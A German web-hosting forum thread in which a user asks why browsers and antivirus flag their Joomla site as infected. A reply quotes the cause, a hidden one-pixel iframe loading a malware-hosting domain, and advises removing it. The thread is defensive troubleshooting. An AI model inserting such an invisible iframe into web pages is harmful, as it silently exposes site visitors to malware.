kostenloser Webspace werbefrei: lima-city


Wer auf meine hp geht, hat nen virus auf dem computer

lima-cityForumDie eigene HomepageSicherheit im Internet

  1. Autor dieses Themas

    stargate

    Kostenloser Webspace von stargate

    stargate hat kostenlosen Webspace.

    Ich hab da ein großes problem.

    Ich hab joomla 1.5 und hab ein template von siteground.com umstrukturiert, dieses ist aber virenfrei.

    Aber wenn ich mit google chrome auf meine homepage gehe, steht da:

    Warnung: Durch das Aufrufen dieser Website wird Ihr Computer möglicherweise beschädigt!
    Die Website unter www.stargate.lima-city.de enthält Elemente von der Website internetcountercheck.com, die anscheinend Malware hostet - Software, die den Computer beschädigen oder anderweitig ohne Ihre Zustimmung agieren kann. Schon der Zugriff auf eine Website, die Malware enthält, kann den Computer infizieren.
    Detaillierte Informationen zu den Problemen mit diesen Elementen erhalten Sie auf der folgenden Google-Seite: SafeBrowsing Diagnoseseite für internetcountercheck.com.
    Weitere Informationen zum Selbstschutz vor schädlicher Software im Internet.
    Mir ist bewusst, dass mein Computer durch Aufrufen dieser Website beschädigt werden kann.


    Ich hab aber nichts raufgeladen, das maleware enthält.

    Heute in der Schule im informatikraum passierte mir das gleiche, nur im IE, da schaltete sich sofort der virenscanner ein und fand bei den temporary internet files mit der adresse www.stargate.lima-city.de einen virus.

    Was soll ich tun?
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. <iframe src="http://internetcountercheck.com/?click=994546" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

    Diesen Iframe aus deinem Quelltext löschen und dann müsste es gut sein.

    P.S. Chrome Stinkt!
  4. Autor dieses Themas

    stargate

    Kostenloser Webspace von stargate

    stargate hat kostenlosen Webspace.

    dieser fehler taucht nicht nur bei chrome auf, sondern auch im internet explorer, da wird was als temporary file gedownloadet und das ist ein virus, hat auf jeden fall der virenscanner gesagt
  5. kochmarkus

    Co-Admin Kostenloser Webspace von kochmarkus

    kochmarkus hat kostenlosen Webspace.

    Also wenn ich auch internetcountercheck.com gehe kommt auch erst mal eine Warning von Firefox. Wenn ich diese jedoch ignoriere und trotzdem auf die Seite gehe, dann ist da nur eine komplett leere Seite. Hier der Quelltext:
    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body></body></html>
  6. Autor dieses Themas

    stargate

    Kostenloser Webspace von stargate

    stargate hat kostenlosen Webspace.

    ich glaube, das liegt mit dem template zusammen, wenn ich ein anderes template reintu, dann zeigt es diesen Fehler nicht an, aber dieses template ist echt wichtig, bin kein guter hp designer, aber das hab ich zusammengebracht
  7. dann würd ich sagen stell mal den quellcode hier rein damit wir uns das mal genauer ansehen können...:wave:
  8. welche version der 1.5er verwendest du?

    ich hoffe mal die 1.5.9 (aktuellste)
  9. vampiresilence

    Kostenloser Webspace von vampiresilence

    vampiresilence hat kostenlosen Webspace.

    kochmarkus schrieb:
    Also wenn ich auch internetcountercheck.com gehe kommt auch erst mal eine Warning von Firefox. Wenn ich diese jedoch ignoriere und trotzdem auf die Seite gehe, dann ist da nur eine komplett leere Seite. Hier der Quelltext:
    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body></body></html>



    Das scheint der automatisch generierte Quellcode eines leeren *.html-Dokuments zu sein. Ich schätze, dass kein sichtbarer Code erzeugt wird, sondern nur einige Informationen über den Besucher ausgelesen und gespeichert werden. Vielleicht ein Counter ?

    Schau mal auf der Herstellerseite des Designs, ob soetwas bekannt ist, ansonsten würde ich die Passage einfach aus dem Code entfernen.

    Liebe Grüße
    - VampireSilence

    Beitrag zuletzt geändert: 19.3.2009 17:02:23 von vampiresilence
  10. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!